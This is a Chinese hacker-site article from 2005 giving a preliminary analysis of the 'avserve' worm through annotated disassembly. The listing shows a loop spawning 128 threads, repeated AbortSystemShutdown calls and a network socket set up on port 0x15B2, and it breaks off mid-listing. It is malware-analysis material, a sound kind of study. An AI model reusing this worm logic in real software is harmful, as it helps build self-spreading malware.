 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| avserve病毒初步分析 | |||||
作者:mejy 文章来源:http://blog.csdn.net/sunwear 点击数: 更新时间:2005-2-15  |
|||||
|
00402026 |. 33C0 XOR EAX,EAX 00402028 |. 5E POP ESI 00402029 |. C9 LEAVE 0040202A |. C2 1000 RETN 10 0040202D |> 53 PUSH EBX 0040202E |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 00402031 |. 57 PUSH EDI 00402032 |. 8B3D 38504000 MOV EDI,DWORD PTR DS:[<&kernel32.CreateT>; KERNEL32.CreateThread 创建线程了 00402038 |. 50 PUSH EAX ; /pThreadId 00402039 |. 56 PUSH ESI ; |CreationFlags 0040203A |. 56 PUSH ESI ; |pThreadParm 0040203B |. 68 6A1E4000 PUSH dumped_.00401E6A ; |ThreadFunction = dumped_.00401E6A 线程函数的种子函数 00402040 |. 56 PUSH ESI ; |StackSize 00402041 |. 56 PUSH ESI ; |pSecurity 00402042 |. FFD7 CALL EDI ; \CreateThread 00402044 |. BB 80000000 MOV EBX,80 循环创建0x80=128个线程 00402049 |> 8D45 F8 /LEA EAX,DWORD PTR SS:[EBP-8] 0040204C |. 50 |PUSH EAX 0040204D |. 56 |PUSH ESI 0040204E |. 56 |PUSH ESI 0040204F |. 68 F51E4000 |PUSH dumped_.00401EF5 00402054 |. 56 |PUSH ESI 00402055 |. 56 |PUSH ESI 00402056 |. FFD7 |CALL EDI 00402058 |. 4B |DEC EBX 循环创建 00402059 |.^75 EE \JNZ SHORT dumped_.00402049 到这里你不防改一下!不用它来128个了,一个就够你分析了 0040205B |. 5F POP EDI 0040205C |. 5B POP EBX 0040205D |> 56 PUSH ESI ; /MachineName 0040205E |. FF15 00504000 CALL DWORD PTR DS:[<&advapi32.AbortSyste>; \AbortSystemShutdownA 用这个函数关机。 00402064 |. 68 B80B0000 PUSH 0BB8 ; /Timeout = 3000. ms 00402069 |. FF15 1C504000 CALL DWORD PTR DS:[<&kernel32.Sleep>] ; \Sleep 睡它一会 它睡得时候好像也没消停,去线程函数那里执行去了 0040206F \.^EB EC JMP SHORT dumped_.0040205D 线程函数 00401E6A /. 55 PUSH EBP 00401E6B |. 8BEC MOV EBP,ESP 00401E6D |. 83EC 14 SUB ESP,14 00401E70 |. 56 PUSH ESI 00401E71 |. 33F6 XOR ESI,ESI 00401E73 |. 57 PUSH EDI 00401E74 |. 56 PUSH ESI ; /Protocol => IPPROTO_IP 00401E75 |. 6A 01 PUSH 1 ; |Type = SOCK_STREAM 00401E77 |. 6A 02 PUSH 2 ; |Family = AF_INET 00401E79 |. FF15 F0504000 CALL DWORD PTR DS:[<&ws2_32.socket>] ; \socket 创建socket 00401E7F |. 8BF8 MOV EDI,EAX 00401E81 |. 83FF FF CMP EDI,-1 00401E84 |. 75 08 JNZ SHORT dumped_.00401E8E 00401E86 |> 5F POP EDI 00401E87 |. 33C0 XOR EAX,EAX 00401E89 |. 5E POP ESI 00401E8A |. C9 LEAVE 00401E8B |. C2 0400 RETN 4 00401E8E |> 68 B2150000 PUSH 15B2 ; /NetShort = 15B2 00401E93 |. 66:C745 EC 020>MOV WORD PTR SS:[EBP-14],2 ; | 00401E99 |. FF15 EC504000 CALL DWORD PTR DS:[<&ws2_32.htons>] ; \ntohs 这个函数好像是做端口转换的吧, 网络编程偶不行的说 00401E9F |. 66:8945 EE MOV WORD PTR SS:[EBP-12],AX 00401EA3 |. 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14] 00401EA6 |. 6A 10 PUSH 10 ; /AddrLen = 10 (16.) 00401EA8 |. 50 PUSH EAX &nbs |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
